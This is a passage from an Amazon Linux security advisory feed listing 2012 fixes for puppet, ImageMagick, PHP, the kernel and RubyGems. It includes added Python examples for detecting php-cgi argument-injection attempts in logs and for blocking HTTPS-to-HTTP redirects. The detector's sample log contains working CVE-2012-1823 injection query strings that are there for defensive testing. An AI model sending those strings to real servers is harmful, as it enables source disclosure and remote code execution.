</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2089" title="" id="CVE-2012-2089" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="nginx" version="1.0.15" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/nginx-1.0.15-1.9.amzn1.i686.rpm</filename></package><package name="nginx-debuginfo" version="1.0.15" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/nginx-debuginfo-1.0.15-1.9.amzn1.i686.rpm</filename></package><package name="nginx" version="1.0.15" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/nginx-1.0.15-1.9.amzn1.x86_64.rpm</filename></package><package name="nginx-debuginfo" version="1.0.15" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/nginx-debuginfo-1.0.15-1.9.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-75</id><title>Amazon Linux - ALAS-2012-75: medium priority package update for puppet</title><issued date="2012-05-08 23:13:00" /><updated date="2014-09-14 16:09:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-1986:
Puppet 2.6.x before 2.6.15 and 2.7.x before 2.7.13, and Puppet Enterprise (PE) Users 1.0, 1.1, 1.2.x, 2.0.x, and 2.5.x before 2.5.1 allows remote authenticated users with an authorized SSL key and certain permissions on the puppet master to read arbitrary files via a symlink attack in conjunction with a crafted REST request for a file in a filebucket.
810069:
CVE-2012-1986 puppet: Filebucket arbitrary file read
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1986" title="" id="CVE-2012-1986" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="puppet-debuginfo" version="2.6.16" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/puppet-debuginfo-2.6.16-1.6.amzn1.i686.rpm</filename></package><package name="puppet" version="2.6.16" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/puppet-2.6.16-1.6.amzn1.i686.rpm</filename></package><package name="puppet-server" version="2.6.16" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/puppet-server-2.6.16-1.6.amzn1.i686.rpm</filename></package><package name="puppet-debuginfo" version="2.6.16" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/puppet-debuginfo-2.6.16-1.6.amzn1.x86_64.rpm</filename></package><package name="puppet" version="2.6.16" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/puppet-2.6.16-1.6.amzn1.x86_64.rpm</filename></package><package name="puppet-server" version="2.6.16" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/puppet-server-2.6.16-1.6.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-76</id><title>Amazon Linux - ALAS-2012-76: medium priority package update for ImageMagick</title><issued date="2012-05-08 23:14:00" /><updated date="2014-09-14 16:09:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-1798:
The TIFFGetEXIFProperties function in coders/tiff.c in ImageMagick before 6.7.6-3 allows remote attackers to cause a denial of service (out-of-bounds read and crash) via a crafted EXIF IFD in a TIFF image.
An out-of-bounds buffer read flaw was found in the way ImageMagick processed certain TIFF image files. A remote attacker could provide a TIFF image with a specially-crafted Exif IFD value (the set of tags for recording Exif-specific attribute information), which once opened by ImageMagick, would cause it to crash.
807997:
CVE-2012-1798 ImageMagick: Out-of-bounds buffer read by copying image bytes for TIFF images with crafted TIFF EXIF IFD value
CVE-2012-0260:
The JPEGWarningHandler function in coders/jpeg.c in ImageMagick before 6.7.6-3 allows remote attackers to cause a denial of service (memory consumption) via a JPEG image with a crafted sequence of restart markers.
A denial of service flaw was found in the way ImageMagick decoded certain JPEG images. A remote attacker could provide a JPEG image with specially-crafted sequences of RST0 through RST7 restart markers (markers that let a decoder resynchronize after corruption in the input stream), which, once processed by ImageMagick, would cause it to consume excessive amounts of memory and CPU time.
807994:
CVE-2012-0260 ImageMagick: excessive CPU use DoS by processing JPEG images with crafted restart markers
CVE-2012-0259:
The GetEXIFProperty function in magick/property.c in ImageMagick before 6.7.6-3 allows remote attackers to cause a denial of service (crash) via a zero value in the component count of an EXIF XResolution tag in a JPEG file, which triggers an out-of-bounds read.
An integer overflow flaw was found in the way ImageMagick processed certain Exif tags with a large components count. An attacker could create a specially-crafted image file that, when opened by a victim, could cause ImageMagick to access invalid memory and crash.
807993:
CVE-2012-0259 ImageMagick: Out-of-bounds heap-based buffer read by processing crafted JPEG EXIF header tag value
CVE-2012-0248:
ImageMagick 6.7.5-7 and earlier allows remote attackers to cause a denial of service (infinite loop and hang) via a crafted image whose IFD contains IOP tags that all reference the beginning of the IFD.
A denial of service flaw was found in the way ImageMagick processed images with malformed Exif metadata. An attacker could create a specially-crafted image file that, when opened by a victim, could cause ImageMagick to enter an infinite loop.
789443:
CVE-2012-0247 CVE-2012-0248 ImageMagick: invalid validation of images denial of service
CVE-2012-0247:
ImageMagick 6.7.5-7 and earlier allows remote attackers to cause a denial of service (memory corruption) and possibly execute arbitrary code via crafted offset and count values in the ResolutionUnit tag in the EXIF IFD0 of an image.
A flaw was found in the way ImageMagick processed images with malformed Exchangeable image file format (Exif) metadata. An attacker could create a specially-crafted image file that, when opened by a victim, would cause ImageMagick to crash or, potentially, execute arbitrary code.
789443:
CVE-2012-0247 CVE-2012-0248 ImageMagick: invalid validation of images denial of service
CVE-2010-4167:
Untrusted search path vulnerability in configure.c in ImageMagick before 6.6.5-5, when MAGICKCORE_INSTALLED_SUPPORT is defined, allows local users to gain privileges via a Trojan horse configuration file in the current working directory.
It was found that ImageMagick utilities tried to load ImageMagick configuration files from the current working directory. If a user ran an ImageMagick utility in an attacker-controlled directory containing a specially-crafted ImageMagick configuration file, it could cause the utility to execute arbitrary code.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4167" title="" id="CVE-2010-4167" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0247" title="" id="CVE-2012-0247" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0248" title="" id="CVE-2012-0248" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0259" title="" id="CVE-2012-0259" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0260" title="" id="CVE-2012-0260" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1798" title="" id="CVE-2012-1798" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0544.html" title="" id="RHSA-2012:0544" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="ImageMagick-doc" version="6.5.4.7" release="6.12.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-doc-6.5.4.7-6.12.amzn1.i686.rpm</filename></package><package name="ImageMagick-devel" version="6.5.4.7" release="6.12.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-devel-6.5.4.7-6.12.amzn1.i686.rpm</filename></package><package name="ImageMagick-debuginfo" version="6.5.4.7" release="6.12.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-debuginfo-6.5.4.7-6.12.amzn1.i686.rpm</filename></package><package name="ImageMagick-perl" version="6.5.4.7" release="6.12.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-perl-6.5.4.7-6.12.amzn1.i686.rpm</filename></package><package name="ImageMagick-c++-devel" version="6.5.4.7" release="6.12.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-c++-devel-6.5.4.7-6.12.amzn1.i686.rpm</filename></package><package name="ImageMagick-c++" version="6.5.4.7" release="6.12.amzn1" epoch="0" 
arch="i686"><filename>Packages/ImageMagick-c++-6.5.4.7-6.12.amzn1.i686.rpm</filename></package><package name="ImageMagick" version="6.5.4.7" release="6.12.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-6.5.4.7-6.12.amzn1.i686.rpm</filename></package><package name="ImageMagick-c++" version="6.5.4.7" release="6.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-c++-6.5.4.7-6.12.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-c++-devel" version="6.5.4.7" release="6.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-c++-devel-6.5.4.7-6.12.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-devel" version="6.5.4.7" release="6.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-devel-6.5.4.7-6.12.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-doc" version="6.5.4.7" release="6.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-doc-6.5.4.7-6.12.amzn1.x86_64.rpm</filename></package><package name="ImageMagick" version="6.5.4.7" release="6.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-6.5.4.7-6.12.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-debuginfo" version="6.5.4.7" release="6.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-debuginfo-6.5.4.7-6.12.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-perl" version="6.5.4.7" release="6.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-perl-6.5.4.7-6.12.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-77</id><title>Amazon Linux - ALAS-2012-77: critical priority package update for php</title><issued date="2012-05-09 14:54:00" /><updated date="2014-09-14 16:10:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux that fix the following 
vulnerabilities:
CVE-2012-1823:
sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not properly handle query strings that lack an = (equals sign) character, which allows remote attackers to execute arbitrary code by placing command-line options in the query string, related to lack of skipping a certain php_getopt for the 'd' case.
A flaw was found in the way the php-cgi executable processed command line arguments when running in CGI mode. A remote attacker could send a specially-crafted request to a PHP script that would result in the query string being parsed by php-cgi as command line options and arguments. This could lead to the disclosure of the script's source code or arbitrary code execution with the privileges of the PHP interpreter.
818607:
CVE-2012-1823 php: command line arguments injection when run in CGI mode (VU#520827)
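The request shape that reaches this flaw is easy to spot in web server logs. The following is an added example, not part of the advisory or of PHP: detection logic in Python run over constructed access-log lines in combined format. It relies on the CGI specification (RFC 3875, section 4.4): a query string containing no literal "=" is handed to the script as command-line arguments, split on "+" and percent-decoded, which is how "-s" or "-d" reached php-cgi's own option parser. Because the "=" test is on the raw query string, attempts typically encode "=" inside option values as %3d, and may encode "-" as %2d; both are decoded before the check below. The assumption that ".php" paths are served by php-cgi is a property of the deployment, not of the advisory.

```python
# Added example, not PHP or Amazon Linux code: flag requests whose query
# string would be passed to php-cgi as argv carrying options. Log lines are
# constructed for this example; the client addresses are documentation ranges.
import re
from urllib.parse import unquote

# Combined log format: client, request line in quotes, status. Groups are
# positional: client, method, target, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "([A-Z]+) (\S+) [^"]*" (\d{3})')


def cgi_argv_from_query(query):
    """argv a CGI program receives for this query string (RFC 3875, 4.4).

    An empty query, or one containing a literal "=", is not passed as argv.
    The test is on the still-encoded string, so "%3d" does not count as "=".
    """
    if query == "" or "=" in query:
        return []
    return [unquote(part) for part in query.split("+")]


def php_cgi_argv(target):
    """argv a php-cgi behind this request target would see, if it carries options."""
    path, _, query = target.partition("?")
    if ".php" not in path.lower():   # deployment assumption: .php goes to php-cgi
        return []
    argv = cgi_argv_from_query(query)
    return argv if any(arg.startswith("-") for arg in argv) else []


def scan_log(lines):
    """Return (client, target, argv) for every request carrying php-cgi options."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue
        client, method, target, status = m.groups()
        argv = php_cgi_argv(target)
        if argv:
            hits.append((client, target, argv))
    return hits


# Constructed sample: two option injections, one encoded variant, two benign.
SAMPLE_LOG = """\
203.0.113.7 - - [09/May/2012:10:01:12 +0000] "GET /index.php?-s HTTP/1.1" 200 5120 "-" "curl/7.21"
203.0.113.7 - - [09/May/2012:10:01:40 +0000] "POST /index.php?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1" 200 88 "-" "curl/7.21"
198.51.100.2 - - [09/May/2012:10:02:05 +0000] "GET /index.php?page=-s HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
198.51.100.2 - - [09/May/2012:10:02:09 +0000] "GET /static/logo.png?-s HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.7 - - [09/May/2012:10:03:00 +0000] "GET /index.php?%2ds HTTP/1.1" 200 5120 "-" "curl/7.21"
"""

if __name__ == "__main__":
    for client, target, argv in scan_log(SAMPLE_LOG.splitlines()):
        print(client, target, argv)
```

The third sample line shows why the literal "=" matters: "?page=-s" is an ordinary parameter and is never passed as argv, whereas the fifth line's "%2ds" decodes to "-s" only after the "=" test has already let it through. A 200 response to "?-s" on an unpatched host would have returned the script's source, so status codes alone do not separate attempts from successes here.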
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1823" title="" id="CVE-2012-1823" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2012:0546.html" title="" id="RHSA-2012:0546" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="php-dba" version="5.3.13" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php-dba-5.3.13-1.20.amzn1.i686.rpm</filename></package><package name="php-process" version="5.3.13" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php-process-5.3.13-1.20.amzn1.i686.rpm</filename></package><package name="php-mysql" version="5.3.13" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php-mysql-5.3.13-1.20.amzn1.i686.rpm</filename></package><package name="php-xml" version="5.3.13" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php-xml-5.3.13-1.20.amzn1.i686.rpm</filename></package><package name="php-pdo" version="5.3.13" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php-pdo-5.3.13-1.20.amzn1.i686.rpm</filename></package><package name="php-snmp" version="5.3.13" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php-snmp-5.3.13-1.20.amzn1.i686.rpm</filename></package><package name="php-mbstring" version="5.3.13" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php-mbstring-5.3.13-1.20.amzn1.i686.rpm</filename></package><package name="php-devel" version="5.3.13" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php-devel-5.3.13-1.20.amzn1.i686.rpm</filename></package><package name="php-xmlrpc" version="5.3.13" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php-xmlrpc-5.3.13-1.20.amzn1.i686.rpm</filename></package><package name="php-mssql" version="5.3.13" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php-mssql-5.3.13-1.20.amzn1.i686.rpm</filename></package><package name="php-soap" version="5.3.13" 
release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php-soap-5.3.13-1.20.amzn1.i686.rpm</filename></package><package name="php-odbc" version="5.3.13" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php-odbc-5.3.13-1.20.amzn1.i686.rpm</filename></package><package name="php-bcmath" version="5.3.13" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php-bcmath-5.3.13-1.20.amzn1.i686.rpm</filename></package><package name="php" version="5.3.13" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php-5.3.13-1.20.amzn1.i686.rpm</filename></package><package name="php-mcrypt" version="5.3.13" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php-mcrypt-5.3.13-1.20.amzn1.i686.rpm</filename></package><package name="php-tidy" version="5.3.13" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php-tidy-5.3.13-1.20.amzn1.i686.rpm</filename></package><package name="php-debuginfo" version="5.3.13" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php-debuginfo-5.3.13-1.20.amzn1.i686.rpm</filename></package><package name="php-ldap" version="5.3.13" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php-ldap-5.3.13-1.20.amzn1.i686.rpm</filename></package><package name="php-recode" version="5.3.13" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php-recode-5.3.13-1.20.amzn1.i686.rpm</filename></package><package name="php-fpm" version="5.3.13" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php-fpm-5.3.13-1.20.amzn1.i686.rpm</filename></package><package name="php-common" version="5.3.13" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php-common-5.3.13-1.20.amzn1.i686.rpm</filename></package><package name="php-imap" version="5.3.13" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php-imap-5.3.13-1.20.amzn1.i686.rpm</filename></package><package name="php-embedded" version="5.3.13" release="1.20.amzn1" epoch="0" 
arch="i686"><filename>Packages/php-embedded-5.3.13-1.20.amzn1.i686.rpm</filename></package><package name="php-cli" version="5.3.13" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php-cli-5.3.13-1.20.amzn1.i686.rpm</filename></package><package name="php-pgsql" version="5.3.13" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php-pgsql-5.3.13-1.20.amzn1.i686.rpm</filename></package><package name="php-intl" version="5.3.13" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php-intl-5.3.13-1.20.amzn1.i686.rpm</filename></package><package name="php-mysqlnd" version="5.3.13" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php-mysqlnd-5.3.13-1.20.amzn1.i686.rpm</filename></package><package name="php-pspell" version="5.3.13" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php-pspell-5.3.13-1.20.amzn1.i686.rpm</filename></package><package name="php-gd" version="5.3.13" release="1.20.amzn1" epoch="0" arch="i686"><filename>Packages/php-gd-5.3.13-1.20.amzn1.i686.rpm</filename></package><package name="php-snmp" version="5.3.13" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-snmp-5.3.13-1.20.amzn1.x86_64.rpm</filename></package><package name="php-mcrypt" version="5.3.13" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mcrypt-5.3.13-1.20.amzn1.x86_64.rpm</filename></package><package name="php" version="5.3.13" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-5.3.13-1.20.amzn1.x86_64.rpm</filename></package><package name="php-devel" version="5.3.13" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-devel-5.3.13-1.20.amzn1.x86_64.rpm</filename></package><package name="php-dba" version="5.3.13" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-dba-5.3.13-1.20.amzn1.x86_64.rpm</filename></package><package name="php-mssql" version="5.3.13" release="1.20.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php-mssql-5.3.13-1.20.amzn1.x86_64.rpm</filename></package><package name="php-process" version="5.3.13" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-process-5.3.13-1.20.amzn1.x86_64.rpm</filename></package><package name="php-imap" version="5.3.13" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-imap-5.3.13-1.20.amzn1.x86_64.rpm</filename></package><package name="php-pspell" version="5.3.13" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-pspell-5.3.13-1.20.amzn1.x86_64.rpm</filename></package><package name="php-bcmath" version="5.3.13" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-bcmath-5.3.13-1.20.amzn1.x86_64.rpm</filename></package><package name="php-common" version="5.3.13" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-common-5.3.13-1.20.amzn1.x86_64.rpm</filename></package><package name="php-xml" version="5.3.13" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-xml-5.3.13-1.20.amzn1.x86_64.rpm</filename></package><package name="php-odbc" version="5.3.13" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-odbc-5.3.13-1.20.amzn1.x86_64.rpm</filename></package><package name="php-debuginfo" version="5.3.13" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-debuginfo-5.3.13-1.20.amzn1.x86_64.rpm</filename></package><package name="php-xmlrpc" version="5.3.13" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-xmlrpc-5.3.13-1.20.amzn1.x86_64.rpm</filename></package><package name="php-fpm" version="5.3.13" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-fpm-5.3.13-1.20.amzn1.x86_64.rpm</filename></package><package name="php-cli" version="5.3.13" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-cli-5.3.13-1.20.amzn1.x86_64.rpm</filename></package><package name="php-pgsql" version="5.3.13" release="1.20.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php-pgsql-5.3.13-1.20.amzn1.x86_64.rpm</filename></package><package name="php-mbstring" version="5.3.13" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mbstring-5.3.13-1.20.amzn1.x86_64.rpm</filename></package><package name="php-ldap" version="5.3.13" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-ldap-5.3.13-1.20.amzn1.x86_64.rpm</filename></package><package name="php-recode" version="5.3.13" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-recode-5.3.13-1.20.amzn1.x86_64.rpm</filename></package><package name="php-intl" version="5.3.13" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-intl-5.3.13-1.20.amzn1.x86_64.rpm</filename></package><package name="php-soap" version="5.3.13" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-soap-5.3.13-1.20.amzn1.x86_64.rpm</filename></package><package name="php-mysqlnd" version="5.3.13" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mysqlnd-5.3.13-1.20.amzn1.x86_64.rpm</filename></package><package name="php-tidy" version="5.3.13" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-tidy-5.3.13-1.20.amzn1.x86_64.rpm</filename></package><package name="php-mysql" version="5.3.13" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-mysql-5.3.13-1.20.amzn1.x86_64.rpm</filename></package><package name="php-pdo" version="5.3.13" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-pdo-5.3.13-1.20.amzn1.x86_64.rpm</filename></package><package name="php-embedded" version="5.3.13" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-embedded-5.3.13-1.20.amzn1.x86_64.rpm</filename></package><package name="php-gd" version="5.3.13" release="1.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/php-gd-5.3.13-1.20.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" 
author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-78</id><title>Amazon Linux - ALAS-2012-78: low priority package update for kernel</title><issued date="2012-05-21 16:47:00" /><updated date="2014-09-14 16:11:00" /><severity>low</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-2313:
The rio_ioctl function in drivers/net/ethernet/dlink/dl2k.c in the Linux kernel before 3.3.7 does not restrict access to the SIOCSMIIREG command, which allows local users to write data to an Ethernet adapter via an ioctl call.
818820:
CVE-2012-2313 kernel: unfiltered netdev rio_ioctl access by users
A flaw was found in the way the Linux kernel's dl2k driver, used by certain D-Link Gigabit Ethernet adapters, restricted IOCTLs. A local, unprivileged user could use this flaw to issue potentially harmful IOCTLs, which could cause Ethernet adapters using the dl2k driver to malfunction (for example, losing network connectivity).
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2313" title="" id="CVE-2012-2313" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="kernel-doc" version="3.2.18" release="1.26.6.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-3.2.18-1.26.6.amzn1.noarch.rpm</filename></package><package name="kernel-tools" version="3.2.18" release="1.26.6.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-3.2.18-1.26.6.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="3.2.18" release="1.26.6.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-3.2.18-1.26.6.amzn1.i686.rpm</filename></package><package name="kernel" version="3.2.18" release="1.26.6.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-3.2.18-1.26.6.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="3.2.18" release="1.26.6.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-3.2.18-1.26.6.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="3.2.18" release="1.26.6.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-3.2.18-1.26.6.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.2.18" release="1.26.6.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-3.2.18-1.26.6.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="3.2.18" release="1.26.6.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-3.2.18-1.26.6.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="3.2.18" release="1.26.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-3.2.18-1.26.6.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="3.2.18" release="1.26.6.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/kernel-debuginfo-3.2.18-1.26.6.amzn1.x86_64.rpm</filename></package><package name="kernel" version="3.2.18" release="1.26.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-3.2.18-1.26.6.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.2.18" release="1.26.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-3.2.18-1.26.6.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="3.2.18" release="1.26.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-3.2.18-1.26.6.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="3.2.18" release="1.26.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-3.2.18-1.26.6.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="3.2.18" release="1.26.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-3.2.18-1.26.6.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2012-79</id><title>Amazon Linux - ALAS-2012-79: medium priority package update for rubygems</title><issued date="2012-05-21 16:48:00" /><updated date="2014-09-14 16:36:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2012-2125:
RubyGems before 1.8.23 can redirect HTTPS connections to HTTP, which makes it easier for remote attackers to observe or modify a gem during installation via a man-in-the-middle attack.
It was found that, when using RubyGems, the connection could be redirected from HTTPS to HTTP. This could lead to a user believing they are installing a gem via HTTPS, when the connection may have been silently downgraded to HTTP.
814718:
CVE-2012-2125 CVE-2012-2126 rubygems: Two security fixes in v1.8.23
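The downgrade described above happens in the redirect step of the fetch, not in the TLS handshake, so the fix is a policy on the Location header. The following is an added example, not RubyGems code: a Python redirect policy that resolves each Location against the current URL and refuses any hop that takes an HTTPS fetch onto plain HTTP, plus a urllib handler showing where such a policy plugs into a real client. The redirect chains and host names are constructed for this example.

```python
# Added example, not RubyGems or Amazon Linux code: refuse HTTPS-to-HTTP
# redirects during a download. The pure function is what the checks exercise;
# the urllib handler shows the integration point in a real client.
import urllib.request
from urllib.parse import urlsplit, urljoin


class DowngradeError(Exception):
    """A redirect would move an HTTPS fetch onto plain HTTP."""


def redirect_allowed(current_url, location):
    """Return the absolute redirect target, or raise DowngradeError.

    Relative Location values are resolved against the current URL, so a bare
    "/path" redirect on an HTTPS fetch stays on HTTPS. Only the https-to-other
    transition is refused; http-to-https is an upgrade and is allowed.
    """
    target = urljoin(current_url, location)
    cur_scheme = urlsplit(current_url).scheme.lower()
    new_scheme = urlsplit(target).scheme.lower()
    if cur_scheme == "https" and new_scheme != "https":
        raise DowngradeError("refusing redirect from %s to %s" % (current_url, target))
    return target


def follow_chain(start_url, locations):
    """Walk a constructed list of Location headers; return the final URL."""
    url = start_url
    for loc in locations:
        url = redirect_allowed(url, loc)
    return url


def is_downgrade(start_url, locations):
    """True when following the chain would have downgraded the fetch."""
    try:
        follow_chain(start_url, locations)
    except DowngradeError:
        return True
    return False


class NoDowngradeRedirectHandler(urllib.request.HTTPRedirectHandler):
    """urllib handler that applies redirect_allowed before each hop.

    urllib resolves newurl to an absolute URL before calling this method.
    """

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        redirect_allowed(req.full_url, newurl)   # raises on https to http
        return super().redirect_request(req, fp, code, msg, headers, newurl)


def safe_opener():
    """An opener that follows redirects but never downgrades to HTTP."""
    return urllib.request.build_opener(NoDowngradeRedirectHandler())


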